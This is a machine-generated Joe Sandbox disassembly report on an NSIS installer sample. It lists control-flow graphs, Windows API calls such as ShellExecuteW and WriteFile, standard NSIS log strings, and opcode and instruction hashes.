                                                                                                          • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                                                          • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                                          • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f7b GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 750 4030e3-4030f2 734->750 751 402387-40238d GlobalFree 734->751 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 747->750 763 402708-40270e 748->763 751->750 763->750
                                                                                                          APIs
                                                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                          • GlobalFree.KERNELBASE(0067C688), ref: 00402387
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeGloballstrcpyn
                                                                                                          • String ID: DatesConsider$Exch: stack < %d elements$Pop: stack empty
                                                                                                          • API String ID: 1459762280-1103588846
                                                                                                          • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                                                          • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                                                          • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                                                          • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 766 4022fd-402325 call 40145c GetFileVersionInfoSizeW 769 4030e3-4030f2 766->769 770 40232b-402339 GlobalAlloc 766->770 770->769 771 40233f-40234e GetFileVersionInfoW 770->771 773 402350-402367 VerQueryValueW 771->773 774 402384-40238d GlobalFree 771->774 773->774 777 402369-402381 call 405f51 * 2 773->777 774->769 777->774
                                                                                                          APIs
                                                                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                          • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                          • GlobalFree.KERNELBASE(0067C688), ref: 00402387
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 3376005127-0
                                                                                                          • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                          • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                                                          • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                          • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 782 402b23-402b37 GlobalAlloc 783 402b39-402b49 call 401446 782->783 784 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 782->784 789 402b70-402b73 783->789 784->789 790 402b93 789->790 791 402b75-402b8d call 405f6a WriteFile 789->791 792 4030e3-4030f2 790->792 791->790 796 402384-40238d GlobalFree 791->796 796->792
                                                                                                          APIs
                                                                                                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                          • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2568930968-0
                                                                                                          • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                          • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                                                          • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                          • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 799 402713-40273b call 406009 * 2 804 402746-402749 799->804 805 40273d-402743 call 40145c 799->805 807 402755-402758 804->807 808 40274b-402752 call 40145c 804->808 805->804 809 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 807->809 810 40275a-402761 call 40145c 807->810 808->807 810->809
                                                                                                          APIs
                                                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                          • String ID: <RM>$DatesConsider$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                          • API String ID: 247603264-950464524
                                                                                                          • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                          • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                                                          • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                          • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 906 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 917 402223-4030f2 call 4062a3 906->917 918 40220d-40221b call 4062a3 906->918 918->917
                                                                                                          APIs
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          Strings
                                                                                                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                          • API String ID: 3156913733-2180253247
                                                                                                          • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                          • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                                                          • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                          • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountFileNameTempTick
                                                                                                          • String ID: nsa
                                                                                                          • API String ID: 1716503409-2209301699
                                                                                                          • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                          • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                                                          • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                          • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                                                          APIs
                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                          • String ID: HideWindow
                                                                                                          • API String ID: 1249568736-780306582
                                                                                                          • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                          • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                                                          • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                          • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                          • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                                                          • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                          • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                          • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                                                          • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                          • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                          • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                                                          • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                          • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                          • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                                                          • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                          • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                          • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                                                          • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                          • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                          • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                                                          • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                          • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                                                          APIs
                                                                                                          • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                                          • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
